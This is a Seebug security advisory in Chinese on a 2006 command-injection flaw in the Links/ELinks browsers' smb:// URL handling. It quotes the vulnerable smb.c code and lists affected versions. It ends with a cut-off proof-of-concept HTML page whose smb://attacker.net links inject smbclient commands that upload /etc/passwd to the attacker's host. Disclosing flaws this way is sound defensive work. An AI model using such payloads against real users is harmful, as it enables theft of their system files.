Links ELinks SMBClient远程命令执行漏洞

2006-11-26T00:00:00
ID SSV:569
Type seebug
Reporter Root
Modified 2006-11-26T00:00:00

Description

Links ELinks是一款web浏览器。

Links ELinks存在一个缺陷,允许恶意web站点在目标机器上执行smbclient命令,此缺陷可能导致从目标系统上读取任意文件或者上传恶意文件到目标系统并执行。

具体问题代码如下:

smb_func() in smb.c: ... 143 if (share) { 144 if (!dir || dir[strlen(dir) - 1] == '/' || dir[strlen(dir) - 1] == '\') { 145 if (dir) { 146 v[n++] = "-D"; 147 v[n++] = dir; 148 } 149 v[n++] = "-c"; 150 v[n++] = "ls"; 151 } else { 152 unsigned char ss; 153 unsigned char s = stracpy("get \""); 'dir' is the directory part of the smb://.. url: 154 add_to_strn(&s, dir); 155 add_to_strn(&s, "\" -"); 156 while ((ss = strchr(s, '/'))) ss = '\'; 157 v[n++] = "-c"; 158 v[n++] = s; 159 } 160 } 161 v[n++] = NULL; smbclient is executed: 162 execvp("smbclient", (char *)v); 163 fprintf(stderr, "smbclient not found in $PATH"); 164 _exit(1); ...

远程攻击者可以利用漏洞读取或者执行任意文件。

攻击所需条件

攻击者必须构建恶意页面,诱使用户访问。

RedHat Enterprise Linux WS 4 RedHat Enterprise Linux ES 4 RedHat Enterprise Linux AS 4 RedHat Desktop 4.0 Links Links 1.00pre12 ELinks ELinks 0.11.1 <a href="http://links.sourceforge.net/" target="_blank">http://links.sourceforge.net/</a>

                                        
                                            
                                                &lt;html&gt;
&lt;a href='smb://attacker.net/work/XXX&quot; YYY; lcd ..; lcd ..; lcd ..; lcd
etc; put passwd ; exit; '&gt;Put /etc/passwd&lt;/a&gt;
&lt;a href='smb://attacker.net/work/XXX&quot; YYY; lcd ..; lcd ..; lcd ..; lcd&lt;br